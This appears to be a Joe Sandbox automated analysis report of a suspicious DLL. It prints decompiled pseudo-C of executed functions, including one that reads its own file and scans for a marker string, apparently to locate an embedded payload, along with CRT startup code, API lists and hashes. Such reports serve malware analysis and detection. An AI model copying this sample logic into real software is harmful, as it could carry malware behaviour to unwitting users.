17189->17191 17191->17184 17192->17008 20550 6da9a340 20551 6da9a359 20550->20551 20552 6da9a377 20550->20552 20551->20552 20553 6da9580c 2 API calls 20551->20553 20553->20551

              Executed Functions

              Function 6DA814D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 192filememoryCOMMON
              Download Yara Rule

              Control-flow Graph

              C-Code - Quality: 64%
              			E6DA814D0(void* __ebx, struct HINSTANCE__** __ecx, void* __eflags) {
				struct HINSTANCE__* _v8;
				intOrPtr _v16;
				char _v17;
				long _v24;
				struct HINSTANCE__** _v28;
				long _v32;
				void* _v36;
				struct _OVERLAPPED* _v40;
				char* _v44;
				struct HINSTANCE__* _v48;
				struct HINSTANCE__* _v52;
				struct HINSTANCE__* _v56;
				struct HINSTANCE__* _v72;
				intOrPtr* _v92;
				void* _t49;
				long _t50;
				void* _t51;
				void* _t56;
				intOrPtr _t57;
				struct HINSTANCE__* _t60;
				struct HINSTANCE__* _t65;
				void* _t68;
				intOrPtr _t69;
				intOrPtr* _t73;
				struct HINSTANCE__* _t78;
				char _t82;
				struct _OVERLAPPED* _t86;
				void* _t88;
				intOrPtr* _t93;
				struct HINSTANCE__** _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				struct HINSTANCE__** _t100;
				intOrPtr _t101;
				void* _t104;
				struct HINSTANCE__* _t105;
				intOrPtr _t106;
				char* _t109;
				struct HINSTANCE__** _t110;
				void* _t112;
				CHAR* _t115;
				void* _t116;
				void* _t117;
				struct HINSTANCE__* _t118;
				struct HINSTANCE__** _t120;
				intOrPtr* _t122;
				struct HINSTANCE__** _t124;
				intOrPtr _t127;
				intOrPtr _t131;

				_t127 = _t131;
				_push(0xffffffff);
				_push(E6DAA2315);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t131;
				_push(__ebx);
				_v72 = 0;
				_v28 = __ecx;
				_v56 = 0;
				_v52 = 0xf;
				_v72 = 0;
				_push(0x30c);
				_v8 = 0;
				_t115 = E6DA8DB20();
				GetModuleFileNameA(0, _t115, 0x30c);
				_t109 = 0;
				_v48 = 0;
				_t86 = 0;
				_v44 = 0;
				_v40 = 0;
				_v8 = 1;
				_t49 = CreateFileA(_t115, 0x80000000, 3, 0, 3, 0, 0); // executed
				_t116 = _t49;
				_t50 = GetFileSize(_t116, 0);
				_v24 = _t50;
				_t51 = LocalAlloc(0, _t50);
				_v36 = _t51;
				_v32 = 0;
				ReadFile(_t116, _t51, _v24,  &_v32, 0); // executed
				FindCloseChangeNotification(_t116); // executed
				_t117 = 0;
				if(_v24 <= 0) {
					_t118 = 0;
				} else {
					do {
						_t82 =  *((intOrPtr*)(_t117 + _v36));
						_v17 = _t82;
						if(_t109 == _t86) {
							E6DA818A0( &_v48, _t109,  &_v17);
							_t86 = _v40;
							_t109 = _v44;
						} else {
							 *_t109 = _t82;
							_t109 = _t109 + 1;
							_v44 = _t109;
						}
						_t117 = _t117 + 1;
					} while (_t117 < _v24);
					_t118 = _v48;
				}
				_t56 = E6DA8B200(_t118, 0, _t109 - _t118);
				_t92 =  !=  ? _t56 : _t109;
				_t144 = ( !=  ? _t56 : _t109) - _t109;
				_t110 = _v28;
				 *_t110 = 0;
				_t110[4] = 0;
				_t110[5] = 0xf;
				 *_t110 = 0;
				if(( !=  ? _t56 : _t109) == _t109) {
					_t93 = 0;
					_t32 = _t93 + 1; // 0x1
					_t104 = _t32;
					asm("o16 nop [eax+eax]");
					do {
						_t57 =  *_t93;
						_t93 = _t93 + 1;
					} while (_t57 != 0);
					_push(_t93 - _t104);
					_t95 = _t110;
					E6DA81770(_t95, 0);
					if(_t118 == 0) {
						goto L13;
					} else {
						_t88 = _t86 - _t118;
						_t60 = _t118;
						if(_t88 < 0x1000) {
							goto L12;
						} else {
							_t118 =  *(_t118 - 4);
							_t88 = _t88 + 0x23;
							if(_t60 - _t118 + 0xfffffffc <= 0x1f) {
								goto L12;
							} else {
								goto L19;
							}
						}
					}
				} else {
					_push(0x21);
					_t95 = _t110;
					E6DA81770(_t95, "gjdhkdfgkjsdghfkjsdhkjslfdghsdkjl");
					if(_t118 == 0) {
						L13:
						 *[fs:0x0] = _v16;
						return _t110;
					} else {
						_t88 = _t86 - _t118;
						_t78 = _t118;
						if(_t88 < 0x1000) {
							L12:
							_push(_t88);
							E6DA893C9(_t118);
							goto L13;
						} else {
							_t118 =  *(_t118 - 4);
							_t88 = _t88 + 0x23;
							if(_t78 - _t118 + 0xfffffffc > 0x1f) {
								L19:
								E6DA8DACF(_t88, _t95, _t104);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t118);
								_t120 = _t95;
								_t65 =  *_t120;
								if(_t65 == 0) {
									L25:
									return _t65;
								} else {
									_t98 = _t120[2] - _t65;
									if(_t98 < 0x1000) {
										L24:
										_push(_t98);
										_t65 = E6DA893C9(_t65);
										 *_t120 = 0;
										_t120[1] = 0;
										_t120[2] = 0;
										goto L25;
									} else {
										_t105 =  *(_t65 - 4);
										_t98 = _t98 + 0x23;
										if(_t65 - _t105 + 0xfffffffc > 0x1f) {
											_t68 = E6DA8DACF(_t88, _t98, _t105);
											asm("int3");
											asm("int3");
											asm("int3");
											_push(_t120);
											_t122 = _t98;
											_t99 =  *(_t122 + 0x14);
											if(_t99 < 0x10) {
												L32:
												 *(_t122 + 0x10) = 0;
												 *(_t122 + 0x14) = 0xf;
												 *_t122 = 0;
												return _t68;
											} else {
												_t69 =  *_t122;
												_t100 =  &(_t99->i);
												if(_t100 < 0x1000) {
													L31:
													_push(_t100);
													_t68 = E6DA893C9(_t69);
													goto L32;
												} else {
													_t106 =  *((intOrPtr*)(_t69 - 4));
													_t100 =  &(_t100[8]);
													if(_t69 - _t106 + 0xfffffffc > 0x1f) {
														E6DA8DACF(_t88, _t100, _t106);
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														_push(_t127);
														_t107 = _v92;
														_t73 = _v92;
														_push(_t122);
														_t124 = _t100;
														_push(_t110);
														_t43 = _t73 + 1; // 0x1
														_t112 = _t43;
														 *_t124 = 0;
														_t124[4] = 0;
														_t124[5] = 0xf;
														do {
															_t101 =  *_t73;
															_t73 = _t73 + 1;
														} while (_t101 != 0);
														_push(_t73 - _t112);
														E6DA81770(_t124, _t107);
														return _t124;
													} else {
														_t69 = _t106;
														goto L31;
													}
												}
											}
										} else {
											_t65 = _t105;
											goto L24;
										}
									}
								}
							} else {
								goto L12;
							}
						}
					}
				}
			}




















































              0x6da814d1
              0x6da814d3
              0x6da814d5
              0x6da814e0
              0x6da814e1
              0x6da814eb
              0x6da814ed
              0x6da814f5
              0x6da814f8
              0x6da814ff
              0x6da81506
              0x6da8150a
              0x6da8150f
              0x6da8151e
              0x6da81528
              0x6da8152e
              0x6da81530
              0x6da81537
              0x6da81539
              0x6da8153c
              0x6da8154c
              0x6da81550
              0x6da81556
              0x6da8155a
              0x6da81562
              0x6da81565
              0x6da8156f
              0x6da81576
              0x6da8157b
              0x6da81582
              0x6da81588
              0x6da8158d
              0x6da815c3
              0x6da81590
              0x6da81590
              0x6da81593
              0x6da81596
              0x6da8159b
              0x6da815ad
              0x6da815b2
              0x6da815b5
              0x6da8159d
              0x6da8159d
              0x6da8159f
              0x6da815a0
              0x6da815a0
              0x6da815b8
              0x6da815b9
              0x6da815be
              0x6da815be
              0x6da815cd
              0x6da815d9
              0x6da815dc
              0x6da815de
              0x6da815e1
              0x6da815e7
              0x6da815ee
              0x6da815f5
              0x6da815f8
              0x6da81645
              0x6da81647
              0x6da81647
              0x6da8164a
              0x6da81650
              0x6da81650
              0x6da81652
              0x6da81653
              0x6da81659
              0x6da8165c
              0x6da8165e
              0x6da81665
              0x00000000
              0x6da81667
              0x6da81667
              0x6da81669
              0x6da81671
              0x00000000
              0x6da81673
              0x6da81673
              0x6da81676
              0x6da81681
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6da81681
              0x6da81671
              0x6da815fa
              0x6da815fa
              0x6da81601
              0x6da81603
              0x6da8160a
              0x6da81632
              0x6da81639
              0x6da81644
              0x6da8160c
              0x6da8160c
              0x6da8160e
              0x6da81616
              0x6da81628
              0x6da81628
              0x6da8162a
              0x00000000
              0x6da81618
              0x6da81618
              0x6da8161b
              0x6da81626
              0x6da81683
              0x6da81683
              0x6da81688
              0x6da81689
              0x6da8168a
              0x6da8168b
              0x6da8168c
              0x6da8168d
              0x6da8168e
              0x6da8168f
              0x6da81690
              0x6da81691
              0x6da81693
              0x6da81697
              0x6da816d6
              0x6da816d7
              0x6da81699
              0x6da8169c
              0x6da816a4
              0x6da816b8
              0x6da816b8
              0x6da816ba
              0x6da816bf
              0x6da816c8
              0x6da816cf
              0x00000000
              0x6da816a6
              0x6da816a6
              0x6da816a9
              0x6da816b4
              0x6da816d8
              0x6da816dd
              0x6da816de
              0x6da816df
              0x6da816e0
              0x6da816e1
              0x6da816e3
              0x6da816e9
              0x6da81712
              0x6da81712
              0x6da81719
              0x6da81720
              0x6da81724
              0x6da816eb
              0x6da816eb
              0x6da816ed
              0x6da816f4
              0x6da81708
              0x6da81708
              0x6da8170a
              0x00000000
              0x6da816f6
              0x6da816f6
              0x6da816f9
              0x6da81704
              0x6da81725
              0x6da8172a
              0x6da8172b
              0x6da8172c
              0x6da8172d
              0x6da8172e
              0x6da8172f
              0x6da81730
              0x6da81733
              0x6da81736
              0x6da81738
              0x6da81739
              0x6da8173b
              0x6da8173c
              0x6da8173c
              0x6da8173f
              0x6da81745
              0x6da8174c
              0x6da81753
              0x6da81753
              0x6da81755
              0x6da81756
              0x6da8175e
              0x6da81760
              0x6da8176a
              0x6da81706
              0x6da81706
              0x00000000
              0x6da81706
              0x6da81704
              0x6da816f4
              0x6da816b6
              0x6da816b6
              0x00000000
              0x6da816b6
              0x6da816b4
              0x6da816a4
              0x00000000
              0x00000000
              0x00000000
              0x6da81626
              0x6da81616
              0x6da8160a

              APIs
              • GetModuleFileNameA.KERNEL32(00000000,00000000,0000030C,?), ref: 6DA81528
              • CreateFileA.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 6DA81550
              • GetFileSize.KERNEL32(00000000,00000000), ref: 6DA8155A
              • LocalAlloc.KERNEL32(00000000,00000000), ref: 6DA81565
              • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 6DA8157B
              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 6DA81582
              Strings
              • gjdhkdfgkjsdghfkjsdhkjslfdghsdkjl, xrefs: 6DA815FC
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: File$AllocChangeCloseCreateFindLocalModuleNameNotificationReadSize
              • String ID: gjdhkdfgkjsdghfkjsdhkjslfdghsdkjl
              • API String ID: 664754120-448965468
              • Opcode ID: 20cad69cf58fe0f53f03f38f9266d19976946d6f153f9c23272cbb4097554140
              • Instruction ID: ba08a7b8226c77d2c59fb53c6336ff364c357bc3ec8c4e4066879b73f06f27d2
              • Opcode Fuzzy Hash: 20cad69cf58fe0f53f03f38f9266d19976946d6f153f9c23272cbb4097554140
              • Instruction Fuzzy Hash: 53514771D092159FEB118FA8CD84BBEFBF8EF09304F190229ED55A7281D7B45D808BA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA89988 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              C-Code - Quality: 87%
              			E6DA89988(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t58;
				void* _t61;
				void* _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t82;

				_t68 = __edx;
				_push(0x10);
				_push(0x6dab10d0);
				E6DA89CA0(__ebx, __edi, __esi);
				_t34 =  *0x6dad51a4; // 0x1
				if(_t34 > 0) {
					 *0x6dad51a4 = _t34 - 1;
					 *(_t82 - 0x1c) = 1;
					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
					 *((char*)(_t82 - 0x20)) = E6DA89558();
					 *(_t82 - 4) = 1;
					__eflags =  *0x6dad5180 - 2;
					if( *0x6dad5180 != 2) {
						E6DA89EC6(_t68, 1, __esi, 7);
						asm("int3");
						_push(0xc);
						_push(0x6dab10f8);
						E6DA89CA0(__ebx, 1, __esi);
						_t72 =  *(_t82 + 0xc);
						__eflags = _t72;
						if(_t72 != 0) {
							L9:
							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
							__eflags = _t72 - 1;
							if(_t72 == 1) {
								L12:
								_t58 =  *(_t82 + 0x10);
								_t76 = E6DA89B43( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
								 *(_t82 - 0x1c) = _t76;
								__eflags = _t76;
								if(_t76 != 0) {
									_t41 = E6DA8982E(_t61,  *((intOrPtr*)(_t82 + 8)), _t72, _t58); // executed
									_t76 = _t41;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t76;
									if(_t76 != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t72 - 2;
								if(_t72 == 2) {
									goto L12;
								} else {
									_t58 =  *(_t82 + 0x10);
									L14:
									_push(_t58);
									_t76 = E6DA864F0( *((intOrPtr*)(_t82 + 8)), _t72);
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t72 - 1;
									if(_t72 == 1) {
										__eflags = _t76;
										if(_t76 == 0) {
											_push(_t58);
											_t45 = E6DA864F0( *((intOrPtr*)(_t82 + 8)), _t42);
											__eflags = _t58;
											_t25 = _t58 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E6DA89988(_t58, _t68, _t72, _t76, _t25);
											_pop(_t61);
											E6DA89B43( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
										}
									}
									__eflags = _t72;
									if(_t72 == 0) {
										L19:
										_t76 = E6DA8982E(_t61,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
										 *(_t82 - 0x1c) = _t76;
										__eflags = _t76;
										if(_t76 != 0) {
											_t76 = E6DA89B43( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
											 *(_t82 - 0x1c) = _t76;
										}
									} else {
										__eflags = _t72 - 3;
										if(_t72 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t82 - 4) = 0xfffffffe;
							_t40 = _t76;
						} else {
							__eflags =  *0x6dad51a4 - _t72; // 0x1
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
						return _t40;
					} else {
						E6DA89623(__ebx, _t61, 1, __esi);
						E6DA8A090();
						E6DA8A0F1();
						 *0x6dad5180 =  *0x6dad5180 & 0x00000000;
						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
						E6DA89A1D();
						_t54 = E6DA897C4( *((intOrPtr*)(_t82 + 8)), 0);
						asm("sbb esi, esi");
						_t80 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t80;
						 *(_t82 - 0x1c) = _t80;
						 *(_t82 - 4) = 0xfffffffe;
						E6DA89A2A();
						_t56 = _t80;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
					return _t56;
				}
			}
















              0x6da89988
              0x6da89988
              0x6da8998a
              0x6da8998f
              0x6da89994
              0x6da8999b
              0x6da899a2
              0x6da899aa
              0x6da899ad
              0x6da899b6
              0x6da899b9
              0x6da899bc
              0x6da899c3
              0x6da89a32
              0x6da89a37
              0x6da89a38
              0x6da89a3a
              0x6da89a3f
              0x6da89a44
              0x6da89a47
              0x6da89a49
              0x6da89a5a
              0x6da89a5a
              0x6da89a5e
              0x6da89a61
              0x6da89a6d
              0x6da89a6d
              0x6da89a7a
              0x6da89a7c
              0x6da89a7f
              0x6da89a81
              0x6da89a8c
              0x6da89a91
              0x6da89a93
              0x6da89a96
              0x6da89a98
              0x00000000
              0x00000000
              0x6da89a98
              0x6da89a63
              0x6da89a63
              0x6da89a66
              0x00000000
              0x6da89a68
              0x6da89a68
              0x6da89a9e
              0x6da89a9e
              0x6da89aa8
              0x6da89aaa
              0x6da89aad
              0x6da89ab0
              0x6da89ab2
              0x6da89ab4
              0x6da89ab6
              0x6da89abb
              0x6da89ac0
              0x6da89ac2
              0x6da89ac2
              0x6da89ac8
              0x6da89ac9
              0x6da89ace
              0x6da89ad4
              0x6da89ad4
              0x6da89ab4
              0x6da89ad9
              0x6da89adb
              0x6da89ae2
              0x6da89aec
              0x6da89aee
              0x6da89af1
              0x6da89af3
              0x6da89aff
              0x6da89b27
              0x6da89b27
              0x6da89add
              0x6da89add
              0x6da89ae0
              0x00000000
              0x00000000
              0x6da89ae0
              0x6da89adb
              0x6da89a66
              0x6da89b2a
              0x6da89b31
              0x6da89a4b
              0x6da89a4b
              0x6da89a51
              0x00000000
              0x6da89a53
              0x6da89a53
              0x6da89a53
              0x6da89a51
              0x6da89b36
              0x6da89b42
              0x6da899c5
              0x6da899c5
              0x6da899ca
              0x6da899cf
              0x6da899d4
              0x6da899db
              0x6da899df
              0x6da899e9
              0x6da899f5
              0x6da899f7
              0x6da899f7
              0x6da899f9
              0x6da899fc
              0x6da89a03
              0x6da89a08
              0x00000000
              0x6da89a08
              0x6da8999d
              0x6da8999d
              0x6da89a0a
              0x6da89a0d
              0x6da89a19
              0x6da89a19

              APIs
              • __RTC_Initialize.LIBCMT ref: 6DA899CF
              • ___scrt_uninitialize_crt.LIBCMT ref: 6DA899E9
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: Initialize___scrt_uninitialize_crt
              • String ID:
              • API String ID: 2442719207-0
              • Opcode ID: a236505dce262cc4b1e070c093390730346c0fb1fe1668dedce63ac4ddce6055
              • Instruction ID: 6c6d5e22557d71d5ba0ee6facce26fbe5f88474d98998ba31da6ec8e35a1386a
              • Opcode Fuzzy Hash: a236505dce262cc4b1e070c093390730346c0fb1fe1668dedce63ac4ddce6055
              • Instruction Fuzzy Hash: 9741C672D0C21AAFDB118F94CB00BBEBAB9EF85B55F064519ED1567182D7308EC29B90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA89A38 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 965 6da89a38-6da89a49 call 6da89ca0 968 6da89a5a-6da89a61 965->968 969 6da89a4b-6da89a51 965->969 971 6da89a6d-6da89a81 dllmain_raw 968->971 972 6da89a63-6da89a66 968->972 969->968 970 6da89a53-6da89a55 969->970 975 6da89b33-6da89b42 970->975 973 6da89b2a-6da89b31 971->973 974 6da89a87-6da89a98 dllmain_crt_dispatch 971->974 972->971 976 6da89a68-6da89a6b 972->976 973->975 974->973 977 6da89a9e-6da89ab0 call 6da864f0 974->977 976->977 980 6da89ad9-6da89adb 977->980 981 6da89ab2-6da89ab4 977->981 983 6da89add-6da89ae0 980->983 984 6da89ae2-6da89af3 dllmain_crt_dispatch 980->984 981->980 982 6da89ab6-6da89ad4 call 6da864f0 call 6da89988 dllmain_raw 981->982 982->980 983->973 983->984 984->973 986 6da89af5-6da89b27 dllmain_raw 984->986 986->973
              C-Code - Quality: 89%
              			E6DA89A38(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t24;
				signed int _t25;
				signed int _t29;
				signed int _t35;
				void* _t37;
				void* _t40;
				signed int _t42;
				signed int _t45;
				void* _t47;
				void* _t52;

				_t40 = __edx;
				_push(0xc);
				_push(0x6dab10f8);
				E6DA89CA0(__ebx, __edi, __esi);
				_t42 =  *(_t47 + 0xc);
				if(_t42 != 0) {
					L3:
					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
					__eflags = _t42 - 1;
					if(_t42 == 1) {
						L6:
						_t35 =  *(_t47 + 0x10);
						_t45 = E6DA89B43( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							L16:
							 *(_t47 - 4) = 0xfffffffe;
							_t24 = _t45;
							L17:
							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
							return _t24;
						}
						_t25 = E6DA8982E(_t37,  *((intOrPtr*)(_t47 + 8)), _t42, _t35); // executed
						_t45 = _t25;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							goto L16;
						}
						L8:
						_push(_t35);
						_t45 = E6DA864F0( *((intOrPtr*)(_t47 + 8)), _t42);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t42 - 1;
						if(_t42 == 1) {
							__eflags = _t45;
							if(_t45 == 0) {
								_push(_t35);
								_t29 = E6DA864F0( *((intOrPtr*)(_t47 + 8)), _t26);
								__eflags = _t35;
								_t14 = _t35 != 0;
								__eflags = _t14;
								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
								E6DA89988(_t35, _t40, _t42, _t45, _t14);
								_pop(_t37);
								E6DA89B43( *((intOrPtr*)(_t47 + 8)), _t45, _t35);
							}
						}
						__eflags = _t42;
						if(_t42 == 0) {
							L13:
							_t45 = E6DA8982E(_t37,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
							 *(_t47 - 0x1c) = _t45;
							__eflags = _t45;
							if(_t45 != 0) {
								_t45 = E6DA89B43( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
								 *(_t47 - 0x1c) = _t45;
							}
							goto L16;
						} else {
							__eflags = _t42 - 3;
							if(_t42 != 3) {
								goto L16;
							}
							goto L13;
						}
					}
					__eflags = _t42 - 2;
					if(_t42 == 2) {
						goto L6;
					}
					_t35 =  *(_t47 + 0x10);
					goto L8;
				}
				_t52 =  *0x6dad51a4 - _t42; // 0x1
				if(_t52 > 0) {
					goto L3;
				}
				_t24 = 0;
				goto L17;
			}













              0x6da89a38
              0x6da89a38
              0x6da89a3a
              0x6da89a3f
              0x6da89a44
              0x6da89a49
              0x6da89a5a
              0x6da89a5a
              0x6da89a5e
              0x6da89a61
              0x6da89a6d
              0x6da89a6d
              0x6da89a7a
              0x6da89a7c
              0x6da89a7f
              0x6da89a81
              0x6da89b2a
              0x6da89b2a
              0x6da89b31
              0x6da89b33
              0x6da89b36
              0x6da89b42
              0x6da89b42
              0x6da89a8c
              0x6da89a91
              0x6da89a93
              0x6da89a96
              0x6da89a98
              0x00000000
              0x00000000
              0x6da89a9e
              0x6da89a9e
              0x6da89aa8
              0x6da89aaa
              0x6da89aad
              0x6da89ab0
              0x6da89ab2
              0x6da89ab4
              0x6da89ab6
              0x6da89abb
              0x6da89ac0
              0x6da89ac2
              0x6da89ac2
              0x6da89ac8
              0x6da89ac9
              0x6da89ace
              0x6da89ad4
              0x6da89ad4
              0x6da89ab4
              0x6da89ad9
              0x6da89adb
              0x6da89ae2
              0x6da89aec
              0x6da89aee
              0x6da89af1
              0x6da89af3
              0x6da89aff
              0x6da89b27
              0x6da89b27
              0x00000000
              0x6da89add
              0x6da89add
              0x6da89ae0
              0x00000000
              0x00000000
              0x00000000
              0x6da89ae0
              0x6da89adb
              0x6da89a63
              0x6da89a66
              0x00000000
              0x00000000
              0x6da89a68
              0x00000000
              0x6da89a68
              0x6da89a4b
              0x6da89a51
              0x00000000
              0x00000000
              0x6da89a53
              0x00000000

              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: dllmain_raw$dllmain_crt_dispatch
              • String ID:
              • API String ID: 3136044242-0
              • Opcode ID: 0711047e2bf707177335fe6cbd54c37caa507a03e9fad230520e57229bb99539
              • Instruction ID: 08d82b0674fff54fe71a2aa84e1b358986a035e3e870ff74bd85f9b96e1ad2d2
              • Opcode Fuzzy Hash: 0711047e2bf707177335fe6cbd54c37caa507a03e9fad230520e57229bb99539
              • Instruction Fuzzy Hash: 5621A375D0C21AAFDB218E54CF44E7F7A79EB85B94F064415FC146B252D3308E828BD0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA9A221 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
              Download Yara Rule

              Control-flow Graph

              C-Code - Quality: 19%
              			E6DA9A221() {
				intOrPtr _v8;
				signed int _v12;
				WCHAR* _t5;
				void* _t6;
				intOrPtr _t9;
				WCHAR* _t10;
				WCHAR* _t19;
				WCHAR* _t26;
				WCHAR* _t29;

				_push(_t21);
				_t5 = GetEnvironmentStringsW();
				_t29 = _t5;
				if(_t29 != 0) {
					_t6 = E6DA9A1EA(_t29);
					_t19 = 0;
					_v12 = _t6 - _t29 >> 1;
					_t9 = E6DA98F81(0, 0, _t29, _t6 - _t29 >> 1, 0, 0, 0, 0);
					_v8 = _t9;
					if(_t9 != 0) {
						_t10 = E6DA9458B(_t9); // executed
						_t26 = _t10;
						_push(0);
						if(_t26 != 0) {
							_push(0);
							_push(_v8);
							_push(_t26);
							_push(_v12);
							_push(_t29);
							_push(0);
							_push(0);
							if(E6DA98F81() != 0) {
								E6DA94760(0);
								_t19 = _t26;
							} else {
								E6DA94760(_t26);
							}
							FreeEnvironmentStringsW(_t29);
							_t5 = _t19;
						} else {
							E6DA94760();
							FreeEnvironmentStringsW(_t29);
							_t5 = 0;
						}
					} else {
						FreeEnvironmentStringsW(_t29);
						_t5 = 0;
					}
				}
				return _t5;
			}












              0x6da9a227
              0x6da9a229
              0x6da9a22f
              0x6da9a233
              0x6da9a23b
              0x6da9a240
              0x6da9a24e
              0x6da9a251
              0x6da9a259
              0x6da9a25e
              0x6da9a26d
              0x6da9a272
              0x6da9a275
              0x6da9a278
              0x6da9a28b
              0x6da9a28c
              0x6da9a28f
              0x6da9a290
              0x6da9a293
              0x6da9a294
              0x6da9a295
              0x6da9a2a0
              0x6da9a2ab
              0x6da9a2b0
              0x6da9a2a2
              0x6da9a2a3
              0x6da9a2a3
              0x6da9a2b4
              0x6da9a2ba
              0x6da9a27a
              0x6da9a27a
              0x6da9a281
              0x6da9a287
              0x6da9a287
              0x6da9a260
              0x6da9a261
              0x6da9a267
              0x6da9a267
              0x6da9a2bd
              0x6da9a2c0

              APIs
              • GetEnvironmentStringsW.KERNEL32 ref: 6DA9A229
                • Part of subcall function 6DA98F81: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6DA97659,?,00000000,-00000008), ref: 6DA9902D
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6DA9A261
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6DA9A281
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
